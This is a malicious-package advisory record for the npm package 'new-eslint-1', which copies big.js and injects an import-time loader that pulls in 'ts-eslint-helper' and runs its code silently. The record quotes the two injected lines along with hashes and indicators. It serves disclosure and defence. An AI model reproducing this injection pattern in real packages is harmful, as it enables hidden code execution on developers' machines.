{"id":"MAL-2026-6225","summary":"Malicious code in new-eslint-1 (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (7752e7f074edbf8521da2ee0b7c68c28a2f76d86576138df8f18e08aaa3a5c38)\nPackage is published as 'new-eslint-1' but its package.json description, README, repository URL (MikeMcl/big.js), and source are a verbatim copy of big.js v7.0.1 — there is no ESLint functionality. Two lines have been injected at module top level in both big.js and big.mjs (lines 605-606): `const helper = require(\"ts-eslint-helper\"); helper.from_str().then(e =\u003e e).catch(e =\u003e { });`. Because package.json declares `\"main\": \"big.js\"`, any `require('new-eslint-1')` synchronously loads the external `ts-eslint-helper` package and invokes `helper.from_str()` in the consumer's Node process, with errors silently swallowed. The required module name (`ts-eslint-helper`) does not match the only declared dependency (`eslint-helper-1@5.0.4`), so the loader is designed to fire when `ts-eslint-helper` resolves transitively or via a sibling install in a monorepo / polluted registry — and to fail silently otherwise, hiding the attempt from observers. This combines namespace deception (eslint-themed name + big.js disguise) with import-time arbitrary code execution under the control of whoever publishes ts-eslint-helper.\n","modified":"2026-06-19T15:47:26.706218968Z","published":"2026-06-19T14:24:00Z","database_specific":{"malicious-packages-origins":[{"versions":["7.0.6"],"sha256":"7752e7f074edbf8521da2ee0b7c68c28a2f76d86576138df8f18e08aaa3a5c38","source":"amazon-inspector","modified_time":"2026-06-19T14:24:00Z","import_time":"2026-06-19T15:41:55.05250236Z","id":"IN-MAL-2026-007068"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/new-eslint-1/v/7.0.6"}],"affected":[{"package":{"name":"new-eslint-1","ecosystem":"npm","purl":"pkg:npm/new-eslint-1"},"versions":["7.0.6"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/new-eslint-1/MAL-2026-6225.json","cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}],"indicators":{"package_integrity":[{"hashes":{"sha512_sri":"sha512-hX05geHm/DgXSmZnlfVu1bjI3qQhKdGu1lJ4U8Ouoyvk1Ro5wjCc7PfMCTtQr8HdiDn1hoOPXf1yNkqelIpz1w==","sha1":"334bea68eb78735839a40c2806d1853f0184ff3c"},"filename":"new-eslint-1-7.0.6.tgz"}],"evidence_files":[{"tlsh":"9cc2658c3ac67579593363788f465088eb38525712c8b286b4ae62b46f78cb107b4fdc","sha256":"d1f1baf7ef7571122bd26e3676d6f2dcf7cc7fd7dc9cdec4c3b75535ad0e3bbf","path":"big.js"},{"path":"package.json","tlsh":"97212267c9a19db70af85b98b86c03a9f1151b1f44a14c5bb07b131c4f3345b2096bbd","sha256":"8f1195fe80df031c849fa47c6eb1bf5fa4b0662a71bba29caf2959f6673b29c2"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}